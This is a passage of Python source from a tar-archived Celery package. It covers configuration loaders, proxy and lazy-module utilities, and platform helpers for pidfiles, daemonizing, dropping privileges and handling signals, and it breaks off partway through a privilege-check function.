raise ValueError(f'{ns_key!r}: {exc}') return ns_key, value return dict(getarg(arg) for arg in args) def read_configuration(self, env='CELERY_CONFIG_MODULE'): try: custom_config = os.environ[env] except KeyError: pass else: if custom_config: usercfg = self._import_config_module(custom_config) return DictAttribute(usercfg) def autodiscover_tasks(self, packages, related_name='tasks'): self.task_modules.update( mod.__name__ for mod in autodiscover_tasks(packages or (), related_name) if mod) @cached_property def default_modules(self): return ( tuple(self.builtin_modules) + tuple(maybe_list(self.app.conf.imports)) + tuple(maybe_list(self.app.conf.include)) ) @property def conf(self): """Loader configuration.""" if self._conf is unconfigured: self._conf = self.read_configuration() return self._conf def autodiscover_tasks(packages, related_name='tasks'): global _RACE_PROTECTION if _RACE_PROTECTION: return () _RACE_PROTECTION = True try: return [find_related_module(pkg, related_name) for pkg in packages] finally: _RACE_PROTECTION = False def find_related_module(package, related_name): """Find module in package.""" # Django 1.7 allows for specifying a class name in INSTALLED_APPS. # (Issue #2248). try: module = importlib.import_module(package) if not related_name and module: return module except ImportError: package, _, _ = package.rpartition('.') if not package: raise module_name = f'{package}.{related_name}' try: return importlib.import_module(module_name) except ImportError as e: import_exc_name = getattr(e, 'name', module_name) if import_exc_name is not None and import_exc_name != module_name: raise e return ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/loaders/default.py0000664000175000017500000000276000000000000017614 0ustar00asifasif00000000000000"""The default loader used when no custom app has been initialized.""" import os import warnings from celery.exceptions import NotConfigured from celery.utils.collections import DictAttribute from celery.utils.serialization import strtobool from .base import BaseLoader __all__ = ('Loader', 'DEFAULT_CONFIG_MODULE') DEFAULT_CONFIG_MODULE = 'celeryconfig' #: Warns if configuration file is missing if :envvar:`C_WNOCONF` is set. C_WNOCONF = strtobool(os.environ.get('C_WNOCONF', False)) class Loader(BaseLoader): """The loader used by the default app.""" def setup_settings(self, settingsdict): return DictAttribute(settingsdict) def read_configuration(self, fail_silently=True): """Read configuration from :file:`celeryconfig.py`.""" configname = os.environ.get('CELERY_CONFIG_MODULE', DEFAULT_CONFIG_MODULE) try: usercfg = self._import_config_module(configname) except ImportError: if not fail_silently: raise # billiard sets this if forked using execv if C_WNOCONF and not os.environ.get('FORKED_BY_MULTIPROCESSING'): warnings.warn(NotConfigured( 'No {module} module found! Please make sure it exists and ' 'is available to Python.'.format(module=configname))) return self.setup_settings({}) else: self.configured = True return self.setup_settings(usercfg) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/local.py0000664000175000017500000003767000000000000015641 0ustar00asifasif00000000000000"""Proxy/PromiseProxy implementation. This module contains critical utilities that needs to be loaded as soon as possible, and that shall not load any third party modules. 
Parts of this module is Copyright by Werkzeug Team. """ import operator import sys from functools import reduce from importlib import import_module from types import ModuleType __all__ = ('Proxy', 'PromiseProxy', 'try_import', 'maybe_evaluate') __module__ = __name__ # used by Proxy class body def _default_cls_attr(name, type_, cls_value): # Proxy uses properties to forward the standard # class attributes __module__, __name__ and __doc__ to the real # object, but these needs to be a string when accessed from # the Proxy class directly. This is a hack to make that work. # -- See Issue #1087. def __new__(cls, getter): instance = type_.__new__(cls, cls_value) instance.__getter = getter return instance def __get__(self, obj, cls=None): return self.__getter(obj) if obj is not None else self return type(name, (type_,), { '__new__': __new__, '__get__': __get__, }) def try_import(module, default=None): """Try to import and return module. Returns None if the module does not exist. """ try: return import_module(module) except ImportError: return default class Proxy: """Proxy to another object.""" # Code stolen from werkzeug.local.Proxy. __slots__ = ('__local', '__args', '__kwargs', '__dict__') def __init__(self, local, args=None, kwargs=None, name=None, __doc__=None): object.__setattr__(self, '_Proxy__local', local) object.__setattr__(self, '_Proxy__args', args or ()) object.__setattr__(self, '_Proxy__kwargs', kwargs or {}) if name is not None: object.__setattr__(self, '__custom_name__', name) if __doc__ is not None: object.__setattr__(self, '__doc__', __doc__) @_default_cls_attr('name', str, __name__) def __name__(self): try: return self.__custom_name__ except AttributeError: return self._get_current_object().__name__ @_default_cls_attr('qualname', str, __name__) def __qualname__(self): try: return self.__custom_name__ except AttributeError: return self._get_current_object().__qualname__ @_default_cls_attr('module', str, __module__) def __module__(self): return self._get_current_object().__module__ @_default_cls_attr('doc', str, __doc__) def __doc__(self): return self._get_current_object().__doc__ def _get_class(self): return self._get_current_object().__class__ @property def __class__(self): return self._get_class() def _get_current_object(self): """Get current object. This is useful if you want the real object behind the proxy at a time for performance reasons or because you want to pass the object into a different context. 
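# --- Illustrative sketch, not part of the original source. ---
# Minimal Proxy usage: the callable passed as ``local`` is re-evaluated on
# every access, and attribute access and operators are forwarded to whatever
# it returns.

from celery.local import Proxy

items = []
p = Proxy(lambda: items)                  # evaluated again on each access
p.append(1)                               # forwarded to the underlying list
assert p._get_current_object() is items
assert len(p) == 1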
""" loc = object.__getattribute__(self, '_Proxy__local') if not hasattr(loc, '__release_local__'): return loc(*self.__args, **self.__kwargs) try: # pragma: no cover # not sure what this is about return getattr(loc, self.__name__) except AttributeError: # pragma: no cover raise RuntimeError(f'no object bound to {self.__name__}') @property def __dict__(self): try: return self._get_current_object().__dict__ except RuntimeError: # pragma: no cover raise AttributeError('__dict__') def __repr__(self): try: obj = self._get_current_object() except RuntimeError: # pragma: no cover return f'<{self.__class__.__name__} unbound>' return repr(obj) def __bool__(self): try: return bool(self._get_current_object()) except RuntimeError: # pragma: no cover return False __nonzero__ = __bool__ # Py2 def __dir__(self): try: return dir(self._get_current_object()) except RuntimeError: # pragma: no cover return [] def __getattr__(self, name): if name == '__members__': return dir(self._get_current_object()) return getattr(self._get_current_object(), name) def __setitem__(self, key, value): self._get_current_object()[key] = value def __delitem__(self, key): del self._get_current_object()[key] def __setslice__(self, i, j, seq): self._get_current_object()[i:j] = seq def __delslice__(self, i, j): del self._get_current_object()[i:j] def __setattr__(self, name, value): setattr(self._get_current_object(), name, value) def __delattr__(self, name): delattr(self._get_current_object(), name) def __str__(self): return str(self._get_current_object()) def __lt__(self, other): return self._get_current_object() < other def __le__(self, other): return self._get_current_object() <= other def __eq__(self, other): return self._get_current_object() == other def __ne__(self, other): return self._get_current_object() != other def __gt__(self, other): return self._get_current_object() > other def __ge__(self, other): return self._get_current_object() >= other def __hash__(self): return hash(self._get_current_object()) def __call__(self, *a, **kw): return self._get_current_object()(*a, **kw) def __len__(self): return len(self._get_current_object()) def __getitem__(self, i): return self._get_current_object()[i] def __iter__(self): return iter(self._get_current_object()) def __contains__(self, i): return i in self._get_current_object() def __getslice__(self, i, j): return self._get_current_object()[i:j] def __add__(self, other): return self._get_current_object() + other def __sub__(self, other): return self._get_current_object() - other def __mul__(self, other): return self._get_current_object() * other def __floordiv__(self, other): return self._get_current_object() // other def __mod__(self, other): return self._get_current_object() % other def __divmod__(self, other): return self._get_current_object().__divmod__(other) def __pow__(self, other): return self._get_current_object() ** other def __lshift__(self, other): return self._get_current_object() << other def __rshift__(self, other): return self._get_current_object() >> other def __and__(self, other): return self._get_current_object() & other def __xor__(self, other): return self._get_current_object() ^ other def __or__(self, other): return self._get_current_object() | other def __div__(self, other): return self._get_current_object().__div__(other) def __truediv__(self, other): return self._get_current_object().__truediv__(other) def __neg__(self): return -(self._get_current_object()) def __pos__(self): return +(self._get_current_object()) def __abs__(self): return 
abs(self._get_current_object()) def __invert__(self): return ~(self._get_current_object()) def __complex__(self): return complex(self._get_current_object()) def __int__(self): return int(self._get_current_object()) def __float__(self): return float(self._get_current_object()) def __oct__(self): return oct(self._get_current_object()) def __hex__(self): return hex(self._get_current_object()) def __index__(self): return self._get_current_object().__index__() def __coerce__(self, other): return self._get_current_object().__coerce__(other) def __enter__(self): return self._get_current_object().__enter__() def __exit__(self, *a, **kw): return self._get_current_object().__exit__(*a, **kw) def __reduce__(self): return self._get_current_object().__reduce__() class PromiseProxy(Proxy): """Proxy that evaluates object once. :class:`Proxy` will evaluate the object each time, while the promise will only evaluate it once. """ __slots__ = ('__pending__', '__weakref__') def _get_current_object(self): try: return object.__getattribute__(self, '__thing') except AttributeError: return self.__evaluate__() def __then__(self, fun, *args, **kwargs): if self.__evaluated__(): return fun(*args, **kwargs) from collections import deque try: pending = object.__getattribute__(self, '__pending__') except AttributeError: pending = None if pending is None: pending = deque() object.__setattr__(self, '__pending__', pending) pending.append((fun, args, kwargs)) def __evaluated__(self): try: object.__getattribute__(self, '__thing') except AttributeError: return False return True def __maybe_evaluate__(self): return self._get_current_object() def __evaluate__(self, _clean=('_Proxy__local', '_Proxy__args', '_Proxy__kwargs')): try: thing = Proxy._get_current_object(self) except Exception: raise else: object.__setattr__(self, '__thing', thing) for attr in _clean: try: object.__delattr__(self, attr) except AttributeError: # pragma: no cover # May mask errors so ignore pass try: pending = object.__getattribute__(self, '__pending__') except AttributeError: pass else: try: while pending: fun, args, kwargs = pending.popleft() fun(*args, **kwargs) finally: try: object.__delattr__(self, '__pending__') except AttributeError: # pragma: no cover pass return thing def maybe_evaluate(obj): """Attempt to evaluate promise, even if obj is not a promise.""" try: return obj.__maybe_evaluate__() except AttributeError: return obj # ############# Module Generation ########################## # Utilities to dynamically # recreate modules, either for lazy loading or # to create old modules at runtime instead of # having them litter the source tree. # import fails in python 2.5. fallback to reduce in stdlib MODULE_DEPRECATED = """ The module %s is deprecated and will be removed in a future version. """ DEFAULT_ATTRS = {'__file__', '__path__', '__doc__', '__all__'} # im_func is no longer available in Py3. # instead the unbound method itself can be used. def fun_of_method(method): return method def getappattr(path): """Get attribute from current_app recursively. Example: ``getappattr('amqp.get_task_consumer')``. 
""" from celery import current_app return current_app._rgetattr(path) COMPAT_MODULES = { 'celery': { 'execute': { 'send_task': 'send_task', }, 'log': { 'get_default_logger': 'log.get_default_logger', 'setup_logger': 'log.setup_logger', 'setup_logging_subsystem': 'log.setup_logging_subsystem', 'redirect_stdouts_to_logger': 'log.redirect_stdouts_to_logger', }, 'messaging': { 'TaskConsumer': 'amqp.TaskConsumer', 'establish_connection': 'connection', 'get_consumer_set': 'amqp.TaskConsumer', }, 'registry': { 'tasks': 'tasks', }, }, } #: We exclude these from dir(celery) DEPRECATED_ATTRS = set(COMPAT_MODULES['celery'].keys()) | {'subtask'} class class_property: def __init__(self, getter=None, setter=None): if getter is not None and not isinstance(getter, classmethod): getter = classmethod(getter) if setter is not None and not isinstance(setter, classmethod): setter = classmethod(setter) self.__get = getter self.__set = setter info = getter.__get__(object) # just need the info attrs. self.__doc__ = info.__doc__ self.__name__ = info.__name__ self.__module__ = info.__module__ def __get__(self, obj, type=None): if obj and type is None: type = obj.__class__ return self.__get.__get__(obj, type)() def __set__(self, obj, value): if obj is None: return self return self.__set.__get__(obj)(value) def setter(self, setter): return self.__class__(self.__get, setter) def reclassmethod(method): return classmethod(fun_of_method(method)) class LazyModule(ModuleType): _compat_modules = () _all_by_module = {} _direct = {} _object_origins = {} def __getattr__(self, name): if name in self._object_origins: module = __import__(self._object_origins[name], None, None, [name]) for item in self._all_by_module[module.__name__]: setattr(self, item, getattr(module, item)) return getattr(module, name) elif name in self._direct: # pragma: no cover module = __import__(self._direct[name], None, None, [name]) setattr(self, name, module) return module return ModuleType.__getattribute__(self, name) def __dir__(self): return [ attr for attr in set(self.__all__) | DEFAULT_ATTRS if attr not in DEPRECATED_ATTRS ] def __reduce__(self): return import_module, (self.__name__,) def create_module(name, attrs, cls_attrs=None, pkg=None, base=LazyModule, prepare_attr=None): fqdn = '.'.join([pkg.__name__, name]) if pkg else name cls_attrs = {} if cls_attrs is None else cls_attrs pkg, _, modname = name.rpartition('.') cls_attrs['__module__'] = pkg attrs = { attr_name: (prepare_attr(attr) if prepare_attr else attr) for attr_name, attr in attrs.items() } module = sys.modules[fqdn] = type( modname, (base,), cls_attrs)(name) module.__dict__.update(attrs) return module def recreate_module(name, compat_modules=None, by_module=None, direct=None, base=LazyModule, **attrs): compat_modules = compat_modules or () by_module = by_module or {} direct = direct or {} old_module = sys.modules[name] origins = get_origins(by_module) compat_modules = COMPAT_MODULES.get(name, ()) _all = tuple(set(reduce( operator.add, [tuple(v) for v in [compat_modules, origins, direct, attrs]], ))) cattrs = { '_compat_modules': compat_modules, '_all_by_module': by_module, '_direct': direct, '_object_origins': origins, '__all__': _all, } new_module = create_module(name, attrs, cls_attrs=cattrs, base=base) new_module.__dict__.update({ mod: get_compat_module(new_module, mod) for mod in compat_modules }) return old_module, new_module def get_compat_module(pkg, name): def prepare(attr): if isinstance(attr, str): return Proxy(getappattr, (attr,)) return attr attrs = 
COMPAT_MODULES[pkg.__name__][name] if isinstance(attrs, str): fqdn = '.'.join([pkg.__name__, name]) module = sys.modules[fqdn] = import_module(attrs) return module attrs['__all__'] = list(attrs) return create_module(name, dict(attrs), pkg=pkg, prepare_attr=prepare) def get_origins(defs): origins = {} for module, attrs in defs.items(): origins.update({attr: module for attr in attrs}) return origins ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/platforms.py0000664000175000017500000006173400000000000016554 0ustar00asifasif00000000000000"""Platforms. Utilities dealing with platform specifics: signals, daemonization, users, groups, and so on. """ import atexit import errno import math import numbers import os import platform as _platform import signal as _signal import sys import warnings from collections import namedtuple from contextlib import contextmanager from billiard.compat import close_open_fds, get_fdmax from billiard.util import set_pdeathsig as _set_pdeathsig # fileno used to be in this module from kombu.utils.compat import maybe_fileno from kombu.utils.encoding import safe_str from .exceptions import SecurityError, SecurityWarning, reraise from .local import try_import try: from billiard.process import current_process except ImportError: # pragma: no cover current_process = None _setproctitle = try_import('setproctitle') resource = try_import('resource') pwd = try_import('pwd') grp = try_import('grp') mputil = try_import('multiprocessing.util') __all__ = ( 'EX_OK', 'EX_FAILURE', 'EX_UNAVAILABLE', 'EX_USAGE', 'SYSTEM', 'IS_macOS', 'IS_WINDOWS', 'SIGMAP', 'pyimplementation', 'LockFailed', 'get_fdmax', 'Pidfile', 'create_pidlock', 'close_open_fds', 'DaemonContext', 'detached', 'parse_uid', 'parse_gid', 'setgroups', 'initgroups', 'setgid', 'setuid', 'maybe_drop_privileges', 'signals', 'signal_name', 'set_process_title', 'set_mp_process_title', 'get_errno_name', 'ignore_errno', 'fd_by_path', 'isatty', ) # exitcodes EX_OK = getattr(os, 'EX_OK', 0) EX_FAILURE = 1 EX_UNAVAILABLE = getattr(os, 'EX_UNAVAILABLE', 69) EX_USAGE = getattr(os, 'EX_USAGE', 64) EX_CANTCREAT = getattr(os, 'EX_CANTCREAT', 73) SYSTEM = _platform.system() IS_macOS = SYSTEM == 'Darwin' IS_WINDOWS = SYSTEM == 'Windows' DAEMON_WORKDIR = '/' PIDFILE_FLAGS = os.O_CREAT | os.O_EXCL | os.O_WRONLY PIDFILE_MODE = ((os.R_OK | os.W_OK) << 6) | ((os.R_OK) << 3) | (os.R_OK) PIDLOCKED = """ERROR: Pidfile ({0}) already exists. Seems we're already running? (pid: {1})""" _range = namedtuple('_range', ('start', 'stop')) ROOT_DISALLOWED = """\ Running a worker with superuser privileges when the worker accepts messages serialized with pickle is a very bad idea! If you really want to continue then you have to set the C_FORCE_ROOT environment variable (but please think about this before you do). User information: uid={uid} euid={euid} gid={gid} egid={egid} """ ROOT_DISCOURAGED = """\ You're running the worker with superuser privileges: this is absolutely not recommended! Please specify a different user using the --uid option. User information: uid={uid} euid={euid} gid={gid} egid={egid} """ ASSUMING_ROOT = """\ An entry for the specified gid or egid was not found. We're assuming this is a potential security issue. 
""" SIGNAMES = { sig for sig in dir(_signal) if sig.startswith('SIG') and '_' not in sig } SIGMAP = {getattr(_signal, name): name for name in SIGNAMES} def isatty(fh): """Return true if the process has a controlling terminal.""" try: return fh.isatty() except AttributeError: pass def pyimplementation(): """Return string identifying the current Python implementation.""" if hasattr(_platform, 'python_implementation'): return _platform.python_implementation() elif sys.platform.startswith('java'): return 'Jython ' + sys.platform elif hasattr(sys, 'pypy_version_info'): v = '.'.join(str(p) for p in sys.pypy_version_info[:3]) if sys.pypy_version_info[3:]: v += '-' + ''.join(str(p) for p in sys.pypy_version_info[3:]) return 'PyPy ' + v else: return 'CPython' class LockFailed(Exception): """Raised if a PID lock can't be acquired.""" class Pidfile: """Pidfile. This is the type returned by :func:`create_pidlock`. See Also: Best practice is to not use this directly but rather use the :func:`create_pidlock` function instead: more convenient and also removes stale pidfiles (when the process holding the lock is no longer running). """ #: Path to the pid lock file. path = None def __init__(self, path): self.path = os.path.abspath(path) def acquire(self): """Acquire lock.""" try: self.write_pid() except OSError as exc: reraise(LockFailed, LockFailed(str(exc)), sys.exc_info()[2]) return self __enter__ = acquire def is_locked(self): """Return true if the pid lock exists.""" return os.path.exists(self.path) def release(self, *args): """Release lock.""" self.remove() __exit__ = release def read_pid(self): """Read and return the current pid.""" with ignore_errno('ENOENT'): with open(self.path) as fh: line = fh.readline() if line.strip() == line: # must contain '\n' raise ValueError( f'Partial or invalid pidfile {self.path}') try: return int(line.strip()) except ValueError: raise ValueError( f'pidfile {self.path} contents invalid.') def remove(self): """Remove the lock.""" with ignore_errno(errno.ENOENT, errno.EACCES): os.unlink(self.path) def remove_if_stale(self): """Remove the lock if the process isn't running. I.e. process does not respons to signal. """ try: pid = self.read_pid() except ValueError: print('Broken pidfile found - Removing it.', file=sys.stderr) self.remove() return True if not pid: self.remove() return True try: os.kill(pid, 0) except os.error as exc: if exc.errno == errno.ESRCH or exc.errno == errno.EPERM: print('Stale pidfile exists - Removing it.', file=sys.stderr) self.remove() return True except SystemError: print('Stale pidfile exists - Removing it.', file=sys.stderr) self.remove() return True return False def write_pid(self): pid = os.getpid() content = f'{pid}\n' pidfile_fd = os.open(self.path, PIDFILE_FLAGS, PIDFILE_MODE) pidfile = os.fdopen(pidfile_fd, 'w') try: pidfile.write(content) # flush and sync so that the re-read below works. pidfile.flush() try: os.fsync(pidfile_fd) except AttributeError: # pragma: no cover pass finally: pidfile.close() rfh = open(self.path) try: if rfh.read() != content: raise LockFailed( "Inconsistency: Pidfile content doesn't match at re-read") finally: rfh.close() PIDFile = Pidfile # XXX compat alias def create_pidlock(pidfile): """Create and verify pidfile. If the pidfile already exists the program exits with an error message, however if the process it refers to isn't running anymore, the pidfile is deleted and the program continues. 
This function will automatically install an :mod:`atexit` handler to release the lock at exit, you can skip this by calling :func:`_create_pidlock` instead. Returns: Pidfile: used to manage the lock. Example: >>> pidlock = create_pidlock('/var/run/app.pid') """ pidlock = _create_pidlock(pidfile) atexit.register(pidlock.release) return pidlock def _create_pidlock(pidfile): pidlock = Pidfile(pidfile) if pidlock.is_locked() and not pidlock.remove_if_stale(): print(PIDLOCKED.format(pidfile, pidlock.read_pid()), file=sys.stderr) raise SystemExit(EX_CANTCREAT) pidlock.acquire() return pidlock def fd_by_path(paths): """Return a list of file descriptors. This method returns list of file descriptors corresponding to file paths passed in paths variable. Arguments: paths: List[str]: List of file paths. Returns: List[int]: List of file descriptors. Example: >>> keep = fd_by_path(['/dev/urandom', '/my/precious/']) """ stats = set() for path in paths: try: fd = os.open(path, os.O_RDONLY) except OSError: continue try: stats.add(os.fstat(fd)[1:3]) finally: os.close(fd) def fd_in_stats(fd): try: return os.fstat(fd)[1:3] in stats except OSError: return False return [_fd for _fd in range(get_fdmax(2048)) if fd_in_stats(_fd)] class DaemonContext: """Context manager daemonizing the process.""" _is_open = False def __init__(self, pidfile=None, workdir=None, umask=None, fake=False, after_chdir=None, after_forkers=True, **kwargs): if isinstance(umask, str): # octal or decimal, depending on initial zero. umask = int(umask, 8 if umask.startswith('0') else 10) self.workdir = workdir or DAEMON_WORKDIR self.umask = umask self.fake = fake self.after_chdir = after_chdir self.after_forkers = after_forkers self.stdfds = (sys.stdin, sys.stdout, sys.stderr) def redirect_to_null(self, fd): if fd is not None: dest = os.open(os.devnull, os.O_RDWR) os.dup2(dest, fd) def open(self): if not self._is_open: if not self.fake: self._detach() os.chdir(self.workdir) if self.umask is not None: os.umask(self.umask) if self.after_chdir: self.after_chdir() if not self.fake: # We need to keep /dev/urandom from closing because # shelve needs it, and Beat needs shelve to start. keep = list(self.stdfds) + fd_by_path(['/dev/urandom']) close_open_fds(keep) for fd in self.stdfds: self.redirect_to_null(maybe_fileno(fd)) if self.after_forkers and mputil is not None: mputil._run_after_forkers() self._is_open = True __enter__ = open def close(self, *args): if self._is_open: self._is_open = False __exit__ = close def _detach(self): if os.fork() == 0: # first child os.setsid() # create new session if os.fork() > 0: # pragma: no cover # second child os._exit(0) else: os._exit(0) return self def detached(logfile=None, pidfile=None, uid=None, gid=None, umask=0, workdir=None, fake=False, **opts): """Detach the current process in the background (daemonize). Arguments: logfile (str): Optional log file. The ability to write to this file will be verified before the process is detached. pidfile (str): Optional pid file. The pidfile won't be created, as this is the responsibility of the child. But the process will exit if the pid lock exists and the pid written is still running. uid (int, str): Optional user id or user name to change effective privileges to. gid (int, str): Optional group id or group name to change effective privileges to. umask (str, int): Optional umask that'll be effective in the child process. workdir (str): Optional new working directory. fake (bool): Don't actually detach, intended for debugging purposes. **opts (Any): Ignored. 
Example: >>> from celery.platforms import detached, create_pidlock >>> with detached( ... logfile='/var/log/app.log', ... pidfile='/var/run/app.pid', ... uid='nobody'): ... # Now in detached child process with effective user set to nobody, ... # and we know that our logfile can be written to, and that ... # the pidfile isn't locked. ... pidlock = create_pidlock('/var/run/app.pid') ... ... # Run the program ... program.run(logfile='/var/log/app.log') """ if not resource: raise RuntimeError('This platform does not support detach.') workdir = os.getcwd() if workdir is None else workdir signals.reset('SIGCLD') # Make sure SIGCLD is using the default handler. maybe_drop_privileges(uid=uid, gid=gid) def after_chdir_do(): # Since without stderr any errors will be silently suppressed, # we need to know that we have access to the logfile. logfile and open(logfile, 'a').close() # Doesn't actually create the pidfile, but makes sure it's not stale. if pidfile: _create_pidlock(pidfile).release() return DaemonContext( umask=umask, workdir=workdir, fake=fake, after_chdir=after_chdir_do, ) def parse_uid(uid): """Parse user id. Arguments: uid (str, int): Actual uid, or the username of a user. Returns: int: The actual uid. """ try: return int(uid) except ValueError: try: return pwd.getpwnam(uid).pw_uid except (AttributeError, KeyError): raise KeyError(f'User does not exist: {uid}') def parse_gid(gid): """Parse group id. Arguments: gid (str, int): Actual gid, or the name of a group. Returns: int: The actual gid of the group. """ try: return int(gid) except ValueError: try: return grp.getgrnam(gid).gr_gid except (AttributeError, KeyError): raise KeyError(f'Group does not exist: {gid}') def _setgroups_hack(groups): # :fun:`setgroups` may have a platform-dependent limit, # and it's not always possible to know in advance what this limit # is, so we use this ugly hack stolen from glibc. groups = groups[:] while 1: try: return os.setgroups(groups) except ValueError: # error from Python's check. if len(groups) <= 1: raise groups[:] = groups[:-1] except OSError as exc: # error from the OS. if exc.errno != errno.EINVAL or len(groups) <= 1: raise groups[:] = groups[:-1] def setgroups(groups): """Set active groups from a list of group ids.""" max_groups = None try: max_groups = os.sysconf('SC_NGROUPS_MAX') except Exception: # pylint: disable=broad-except pass try: return _setgroups_hack(groups[:max_groups]) except OSError as exc: if exc.errno != errno.EPERM: raise if any(group not in groups for group in os.getgroups()): # we shouldn't be allowed to change to this group. raise def initgroups(uid, gid): """Init process group permissions. Compat version of :func:`os.initgroups` that was first added to Python 2.7. """ if not pwd: # pragma: no cover return username = pwd.getpwuid(uid)[0] if hasattr(os, 'initgroups'): # Python 2.7+ return os.initgroups(username, gid) groups = [gr.gr_gid for gr in grp.getgrall() if username in gr.gr_mem] setgroups(groups) def setgid(gid): """Version of :func:`os.setgid` supporting group names.""" os.setgid(parse_gid(gid)) def setuid(uid): """Version of :func:`os.setuid` supporting usernames.""" os.setuid(parse_uid(uid)) def maybe_drop_privileges(uid=None, gid=None): """Change process privileges to new user/group. If UID and GID is specified, the real user/group is changed. If only UID is specified, the real user is changed, and the group is changed to the users primary group. If only GID is specified, only the group is changed. 
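# --- Illustrative sketch, not part of the original source. ---
# maybe_drop_privileges() accepts numeric ids or names (resolved via pwd/grp);
# when only ``uid`` is given, the group is switched to that user's primary
# group.  It only takes effect when the process starts with root privileges;
# the user name below is an assumption about the target system.

from celery.platforms import maybe_drop_privileges

maybe_drop_privileges(uid='nobody')       # gid defaults to nobody's primary group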
""" if sys.platform == 'win32': return if os.geteuid(): # no point trying to setuid unless we're root. if not os.getuid(): raise SecurityError('contact support') uid = uid and parse_uid(uid) gid = gid and parse_gid(gid) if uid: _setuid(uid, gid) else: gid and setgid(gid) if uid and not os.getuid() and not os.geteuid(): raise SecurityError('Still root uid after drop privileges!') if gid and not os.getgid() and not os.getegid(): raise SecurityError('Still root gid after drop privileges!') def _setuid(uid, gid): # If GID isn't defined, get the primary GID of the user. if not gid and pwd: gid = pwd.getpwuid(uid).pw_gid # Must set the GID before initgroups(), as setgid() # is known to zap the group list on some platforms. # setgid must happen before setuid (otherwise the setgid operation # may fail because of insufficient privileges and possibly stay # in a privileged group). setgid(gid) initgroups(uid, gid) # at last: setuid(uid) # ... and make sure privileges cannot be restored: try: setuid(0) except OSError as exc: if exc.errno != errno.EPERM: raise # we should get here: cannot restore privileges, # everything was fine. else: raise SecurityError( 'non-root user able to restore privileges after setuid.') if hasattr(_signal, 'setitimer'): def _arm_alarm(seconds): _signal.setitimer(_signal.ITIMER_REAL, seconds) else: def _arm_alarm(seconds): _signal.alarm(math.ceil(seconds)) class Signals: """Convenience interface to :mod:`signals`. If the requested signal isn't supported on the current platform, the operation will be ignored. Example: >>> from celery.platforms import signals >>> from proj.handlers import my_handler >>> signals['INT'] = my_handler >>> signals['INT'] my_handler >>> signals.supported('INT') True >>> signals.signum('INT') 2 >>> signals.ignore('USR1') >>> signals['USR1'] == signals.ignored True >>> signals.reset('USR1') >>> signals['USR1'] == signals.default True >>> from proj.handlers import exit_handler, hup_handler >>> signals.update(INT=exit_handler, ... TERM=exit_handler, ... HUP=hup_handler) """ ignored = _signal.SIG_IGN default = _signal.SIG_DFL def arm_alarm(self, seconds): return _arm_alarm(seconds) def reset_alarm(self): return _signal.alarm(0) def supported(self, name): """Return true value if signal by ``name`` exists on this platform.""" try: self.signum(name) except AttributeError: return False else: return True def signum(self, name): """Get signal number by name.""" if isinstance(name, numbers.Integral): return name if not isinstance(name, str) \ or not name.isupper(): raise TypeError('signal name must be uppercase string.') if not name.startswith('SIG'): name = 'SIG' + name return getattr(_signal, name) def reset(self, *signal_names): """Reset signals to the default signal handler. Does nothing if the platform has no support for signals, or the specified signal in particular. """ self.update((sig, self.default) for sig in signal_names) def ignore(self, *names): """Ignore signal using :const:`SIG_IGN`. Does nothing if the platform has no support for signals, or the specified signal in particular. """ self.update((sig, self.ignored) for sig in names) def __getitem__(self, name): return _signal.getsignal(self.signum(name)) def __setitem__(self, name, handler): """Install signal handler. Does nothing if the current platform has no support for signals, or the specified signal in particular. 
""" try: _signal.signal(self.signum(name), handler) except (AttributeError, ValueError): pass def update(self, _d_=None, **sigmap): """Set signal handlers from a mapping.""" for name, handler in dict(_d_ or {}, **sigmap).items(): self[name] = handler signals = Signals() get_signal = signals.signum # compat install_signal_handler = signals.__setitem__ # compat reset_signal = signals.reset # compat ignore_signal = signals.ignore # compat def signal_name(signum): """Return name of signal from signal number.""" return SIGMAP[signum][3:] def strargv(argv): arg_start = 2 if 'manage' in argv[0] else 1 if len(argv) > arg_start: return ' '.join(argv[arg_start:]) return '' def set_pdeathsig(name): """Sends signal ``name`` to process when parent process terminates.""" if signals.supported('SIGKILL'): try: _set_pdeathsig(signals.signum('SIGKILL')) except OSError: # We ignore when OS does not support set_pdeathsig pass def set_process_title(progname, info=None): """Set the :command:`ps` name for the currently running process. Only works if :pypi:`setproctitle` is installed. """ proctitle = f'[{progname}]' proctitle = f'{proctitle} {info}' if info else proctitle if _setproctitle: _setproctitle.setproctitle(safe_str(proctitle)) return proctitle if os.environ.get('NOSETPS'): # pragma: no cover def set_mp_process_title(*a, **k): """Disabled feature.""" else: def set_mp_process_title(progname, info=None, hostname=None): """Set the :command:`ps` name from the current process name. Only works if :pypi:`setproctitle` is installed. """ if hostname: progname = f'{progname}: {hostname}' name = current_process().name if current_process else 'MainProcess' return set_process_title(f'{progname}:{name}', info=info) def get_errno_name(n): """Get errno for string (e.g., ``ENOENT``).""" if isinstance(n, str): return getattr(errno, n) return n @contextmanager def ignore_errno(*errnos, **kwargs): """Context manager to ignore specific POSIX error codes. Takes a list of error codes to ignore: this can be either the name of the code, or the code integer itself:: >>> with ignore_errno('ENOENT'): ... with open('foo', 'r') as fh: ... return fh.read() >>> with ignore_errno(errno.ENOENT, errno.EPERM): ... pass Arguments: types (Tuple[Exception]): A tuple of exceptions to ignore (when the errno matches). Defaults to :exc:`Exception`. """ types = kwargs.get('types') or (Exception,) errnos = [get_errno_name(errno) for errno in errnos] try: yield except types as exc: if not hasattr(exc, 'errno'): raise if exc.errno not in errnos: raise def check_privileges(accept_content): if grp is None or pwd is None: return pickle_or_serialize = ('pickle' in accept_content or 'application/group-python-serialize' in accept_content) uid = os.getuid() if hasattr(os, 'getuid') else 65535 gid = os.getgid() if hasattr(os, 'getgid') else 65535 euid = os.geteuid() if hasattr(os, 'geteuid') else 65535 egid = os.getegid() if hasattr(os, 'getegid') else 65535 if hasattr(os, 'fchown'): if not all(hasattr(os, attr) for attr in ('getuid', 'getgid', 'geteuid', 'getegid')): raise SecurityError('suspicious platform, contact support') # Get the group database entry for the current user's group and effective # group id using grp.getgrgid() method # We must handle the case where either the gid or the egid are not found. 
